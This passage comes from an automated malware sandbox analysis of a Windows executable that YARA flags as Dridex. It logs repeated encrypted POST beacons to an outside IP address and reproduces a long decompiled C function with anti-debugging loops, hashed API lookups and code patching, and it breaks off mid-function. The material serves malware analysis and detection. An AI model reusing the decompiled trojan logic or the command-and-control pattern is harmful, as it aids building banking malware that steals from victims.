2021-12-31 08:54:06 UTC	169	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:54:07 UTC	174	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:53:10 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.7	49931	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:54:10 UTC	174	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:54:10 UTC	174	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:54:11 UTC	179	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:53:14 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
36	192.168.2.7	49934	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:54:13 UTC	179	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:54:13 UTC	179	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:54:14 UTC	184	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:53:17 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49775	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:29 UTC	19	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:29 UTC	20	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:30 UTC	24	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:33 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49778	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:33 UTC	24	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:33 UTC	25	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:34 UTC	29	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:37 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49781	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:36 UTC	29	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:36 UTC	30	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:37 UTC	34	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:40 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49787	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:39 UTC	34	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:39 UTC	35	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:40 UTC	39	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49790	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:43 UTC	39	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:43 UTC	40	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:44 UTC	44	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.7	49793	103.9.36.172	443	C:\Users\user\Desktop\K9jgh4owKk.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-31 08:52:47 UTC	44	OUT	POST / HTTP/1.1 Host: 103.9.36.172 Content-Length: 4857 Connection: Close Cache-Control: no-cache
2021-12-31 08:52:47 UTC	44	OUT	Data Raw: 9f 0b 8c ac a4 07 56 0e a1 f0 8c bc 82 a5 c9 02 63 50 79 fe 58 0e 8f 5a 46 56 a5 7c 0f c0 ff 08 c7 58 d7 23 6e 61 5f 08 55 a8 bb ec 91 76 b4 ac ef 52 83 b1 2d 1e 4b fe f6 c0 4d 59 d5 6d 37 97 60 2c 19 53 c2 f8 44 a0 6d 0a c9 fc 8c 15 9d 40 fb 46 83 b1 82 60 ed 01 c1 2a 76 d5 71 80 7c 95 fa c7 f5 f2 04 87 e4 59 f4 d3 c7 43 9a 05 14 16 19 9f c7 20 da 28 bd 65 d6 de f3 08 12 c6 5b 12 5b 40 84 6c 19 13 b4 6c 47 d1 d3 c8 69 34 64 0e 68 f9 a3 62 11 e4 17 2f 33 53 af c8 58 47 50 c1 4d ea 69 1e 2c e9 d5 b1 0b 89 24 3c 9d 06 cb 90 5d 8e d2 de 2c eb 39 12 19 c7 6c df 2b 99 cb ad ab 69 7e 4c 1c a4 22 a7 5c f9 27 e3 a9 ee 30 08 08 d6 ef 04 09 51 12 2a f6 ff 4d 72 10 4a f8 8c 38 60 03 2a 02 46 ae 3f ca a4 c4 b2 6f 5e b0 7e da 76 e7 1f a0 2a 8a 38 33 c4 84 eb 68 96 86 Data Ascii: VcPyXZFV\|X#na_UvR-KMYm7`,SDm@F`vq\|YC (e[[@llGi4dhb/3SXGPMi,$<],9l+i~L"\'0QMrJ8`F?o^~v83h
2021-12-31 08:52:47 UTC	49	IN	HTTP/1.1 403 Forbidden Server: nginx/1.0.15 Date: Fri, 31 Dec 2021 08:51:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: K9jgh4owKk.exe PID: 6772 Parent PID: 1696

General

Start time:	09:52:08
Start date:	31/12/2021
Path:	C:\Users\user\Desktop\K9jgh4owKk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\K9jgh4owKk.exe"
Imagebase:	0x400000
File size:	668672 bytes
MD5 hash:	A5EB3426E582795B6393A328CD27BF94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.512470585.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: K9jgh4owKk.exe PID: 6772 Parent PID: 1696 K9jgh4owKk.exeCOMMON

Executed Functions

Function 00405150, Relevance: 30.6, APIs: 14, Strings: 3, Instructions: 826
sleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00405150() {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t173;
				signed int _t175;
				signed int _t184;
				signed int _t186;
				signed int _t192;
				signed int _t194;
				void* _t197;
				signed int _t205;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t233;
				intOrPtr _t234;
				intOrPtr _t235;
				intOrPtr* _t238;
				void* _t253;
				void* _t263;
				intOrPtr _t266;
				signed int _t276;
				signed int _t280;
				void* _t295;
				intOrPtr* _t296;
				signed int _t299;
				unsigned int _t303;
				intOrPtr _t306;
				signed short* _t307;
				signed int _t310;
				signed int _t327;
				signed int _t328;
				signed int _t333;
				char* _t341;
				char _t343;
				signed int _t354;
				signed int _t369;
				signed int _t370;
				signed int _t373;
				signed int _t374;
				void* _t379;
				signed int _t380;
				signed int _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t430;
				intOrPtr* _t438;
				signed int _t453;
				signed int _t455;
				signed int _t458;
				signed int _t490;
				signed int _t492;
				signed int _t504;
				signed int _t505;
				signed int _t525;
				signed int _t534;
				void* _t539;
				signed int _t540;
				signed int _t548;
				intOrPtr* _t549;
				void* _t552;
				intOrPtr _t555;
				intOrPtr _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				intOrPtr* _t562;

				_push(_t537);
				_push(_t533);
				_t562 = _t561 - 0x204;
				_push(1);
				E00417980(_t562 + 0x12c);
				_t173 = E004115C0(0xa1310f65, 0x755128fe);
				if(_t173 == 0) {
					 *0x43b1b5 = 0;
					 *0x43b1ad = 0;
					 *0x43b1b1 = 0;
					 *0x43b1b9 = 0;
					 *0x43b1bd = 0;
					__eflags =  *0x43b026 & 0x000000ff;
					if(( *0x43b026 & 0x000000ff) != 0) {
						E00425CB0(_t562 + 0xdc, 3, 0x28, 0x64);
						_t382 = 0;
						__eflags = 0;
						_t557 = _t562 + 0x1e4;
						while(1) {
							L4:
							E00425CB0(_t557, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1e4));
							Sleep(0xa);
							E00420B10(_t557);
							_t382 = _t382 + 1;
							__eflags = _t382 - 0xbebbe7c;
							if(_t382 >= 0xbebbe7c) {
								break;
							} else {
								goto L5;
							}
							while(1) {
								L5:
								__eflags = _t382 - 0x137b;
								if(_t382 < 0x137b) {
									goto L4;
								}
								_t382 = _t382 + 1;
								__eflags = _t382 - 0xbebbe7c;
								if(_t382 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L8;
							}
						}
						L8:
						_t383 = 0;
						__eflags = 0;
						_t558 = _t562 + 0x1ec;
						while(1) {
							L9:
							E00425CB0(_t558, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1ec));
							Sleep(0xa);
							E00420B10(_t558);
							_t383 = _t383 + 1;
							__eflags = _t383 - 0xbebbe7c;
							if(_t383 >= 0xbebbe7c) {
								break;
							} else {
								goto L10;
							}
							while(1) {
								L10:
								__eflags = _t383 - 0x137b;
								if(_t383 < 0x137b) {
									goto L9;
								}
								_t383 = _t383 + 1;
								__eflags = _t383 - 0xbebbe7c;
								if(_t383 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L13;
							}
						}
						L13:
						_t384 = 0;
						__eflags = 0;
						_t559 = _t562 + 0x1f4;
						while(1) {
							L14:
							E00425CB0(_t559, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1f4));
							Sleep(0xa);
							E00420B10(_t559);
							_t384 = _t384 + 1;
							__eflags = _t384 - 0xbebbe7c;
							if(_t384 >= 0xbebbe7c) {
								break;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								__eflags = _t384 - 0x137b;
								if(_t384 < 0x137b) {
									goto L14;
								}
								_t384 = _t384 + 1;
								__eflags = _t384 - 0xbebbe7c;
								if(_t384 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L18;
							}
						}
						L18:
						_t385 = 0;
						__eflags = 0;
						_t560 = _t562 + 0x1fc;
						while(1) {
							L19:
							E00425CB0(_t560, 3, 0x14, 0x50);
							OutputDebugStringA( *(_t562 + 0x1fc));
							Sleep(0xa);
							E00420B10(_t560);
							_t385 = _t385 + 1;
							__eflags = _t385 - 0xbebbe7c;
							if(_t385 >= 0xbebbe7c) {
								break;
							} else {
								goto L20;
							}
							while(1) {
								L20:
								__eflags = _t385 - 0x137b;
								if(_t385 < 0x137b) {
									goto L19;
								}
								_t385 = _t385 + 1;
								__eflags = _t385 - 0xbebbe7c;
								if(_t385 < 0xbebbe7c) {
									continue;
								} else {
									OutputDebugStringA( *(_t562 + 0xd4));
								}
								goto L23;
							}
						}
						L23:
						E00420B10(_t562 + 0xd4);
					}
					_push(0x755aa3f0);
					_t175 = E00417560();
					__eflags = _t175;
					if(_t175 != 0) {
						_t341 = E004115C0(0x588ab3ea, 0x1be15feb);
						__eflags =  *_t341 - 0xe9;
						if( *_t341 == 0xe9) {
							_t150 =  *((intOrPtr*)(_t341 + 1)) + 5; // 0x5
							_t379 = _t341 + _t150;
							_t490 = E004115C0(0x588ab3ea, 0x3b4caff7);
							__eflags = _t490;
							if(_t490 == 0) {
								L139:
								_t555 =  *0x439414; // 0x3f7883
								_t343 =  *0x43941a; // -16
								 *((intOrPtr*)(_t562 + 0xdc)) = _t555;
								 *((short*)(_t562 + 0xe0)) =  *0x439418 & 0x0000ffff;
								 *((char*)(_t562 + 0xe2)) = _t343;
								_t537 =  *(_t562 + 0x6c);
								_t556 =  *((intOrPtr*)(_t562 + 0x78));
								while(1) {
									_push(0x3f);
									_push(7);
									_push(_t562 + 0xe4);
									_t380 = E00410DA0(_t537, _t556);
									__eflags = _t380;
									if(_t380 == 0) {
										goto L26;
									}
									 *(_t562 + 0xec) = _t380;
									 *((intOrPtr*)(_t562 + 0xf0)) = 0x10;
									_t556 = _t556 -  ~_t537 + _t380 + 7;
									 *((intOrPtr*)(_t562 + 0xf4)) = 0x40;
									_t161 = _t380 + 7; // 0x7
									_t537 = _t161;
									_t492 = E004115C0(0x588ab3ea, 0x649746ec);
									__eflags = _t492;
									if(_t492 != 0) {
										_t533 = _t562 + 0xf0;
										 *_t492(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
									 *((char*)(_t380 + 5)) = 0x90;
									 *((char*)(_t380 + 4)) = 0x90;
									_t525 = E004115C0(0x588ab3ea, 0x649746ec);
									__eflags = _t525;
									if(_t525 != 0) {
										_t533 = _t562 + 0xec;
										 *_t525(0xffffffff, _t562 + 0xec, _t562 + 0xf0,  *((intOrPtr*)(_t562 + 0xf8)), _t562 + 0xf4);
									}
								}
								goto L26;
							} else {
								_t354 =  *_t490(0xffffffff, _t379, 0, _t562 + 0x6c, 0x1c, 0);
								__eflags = _t354;
								if(_t354 != 0) {
									goto L26;
								} else {
									goto L139;
								}
							}
							goto L145;
						}
					}
					L26:
					E00401270(_t533, _t537);
					 *((intOrPtr*)(_t562 + 0x12c)) = 0x2800;
					_push(0x2800);
					E00429350(_t562 + 0xfc);
					_t548 = E00429640(_t562 + 0xfc, 0);
					_t504 = E004115C0(0xd93f3271, 0xa1ee59b);
					__eflags = _t504;
					if(_t504 != 0) {
						 *_t504(_t548, _t562 + 0x12c); // executed
					}
					__eflags = _t548;
					if(_t548 != 0) {
						_t537 = 0x4b005452;
						do {
							__eflags =  *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1;
							if(( *((intOrPtr*)(_t548 + 0x194)) - _t537 | ( *(_t548 + 0x198) & 0x0000ffff) - 0x000031a1) == 0) {
								E00405150();
							}
							_t548 =  *_t548;
							__eflags = _t548;
						} while (_t548 != 0);
					}
					E00429510(_t562 + 0xf8);
					E00418810(_t562 + 0x108, 0);
					 *0x43b1c8 = _t562 + 0x108;
					_t184 = E004115C0(0xa1310f65, 0xe10858ef);
					__eflags = _t184;
					if(_t184 == 0) {
						__eflags = 0;
						_t186 = E004115C0(0x1b47f147, 0x4c00b324);
						__eflags = _t186;
						if(_t186 == 0) {
							 *0x43b1d0 = 0;
							_t549 = E00413930(0, 0, _t533, _t537);
							__eflags =  *_t549 - 0x10;
							if( *_t549 < 0x10) {
								E00405150();
							}
							E00406020(0);
							E00418810(_t562 + 0x114, 0x200);
							_t505 = E004115C0(0xa1310f65, 0xc4d11e8a);
							__eflags = _t505;
							if(_t505 != 0) {
								_t333 =  *(_t562 + 0x114) >> 1;
								__eflags = _t333;
								 *_t505(0,  *(_t562 + 0x114), _t333);
							}
							E00412580(_t562 + 0x118, _t533, _t537);
							_t192 = E00419C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x118)));
							__eflags = _t192;
							if(_t192 == 0) {
								E00412780(_t562 + 0xe4, _t533, _t537);
								_t194 = E00419C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0xe4)));
								__eflags = _t194;
								if(_t194 == 0) {
									E00412580(_t562 + 0xb4, _t533, _t537);
									_t537 = _t562 + 0x98;
									E0041D980(_t562 + 0xbc, _t562 + 0x98, 0x5c);
									_t197 = E00427600(_t562 + 0x98, 2);
									E0040AC00(_t562 + 0xbc, 6);
									E00418CC0(_t197,  *((intOrPtr*)(_t562 + 0xbc)));
									E00418CA0(_t562 + 0xbc);
									E004289F0(_t537, _t562 + 0x124, 0x5c);
									E00428910(_t537, _t533, _t537);
									E00418CA0(_t562 + 0xb4);
									_t205 = E00419C70(_t562 + 0x114, _t533,  *((intOrPtr*)(_t562 + 0x120)));
									__eflags = _t205;
									_t47 = _t205 > 0;
									__eflags = _t47;
									_t369 = 0 | _t47;
									E00418CA0(_t562 + 0x120);
								} else {
									_t369 = 1;
								}
								E00418CA0(_t562 + 0xe4);
								E00418CA0(_t562 + 0x118);
								__eflags = _t369;
								if(_t369 == 0) {
									_t370 = 0;
									__eflags = 0;
								} else {
									goto L48;
								}
							} else {
								E00418CA0(_t562 + 0x118);
								L48:
								_t370 = 1;
							}
							E0040AC00(_t562 + 0x120, 2);
							E0041D980(_t562 + 0x128, _t562 + 0x130, 0x7e);
							E00418CA0(_t562 + 0x120);
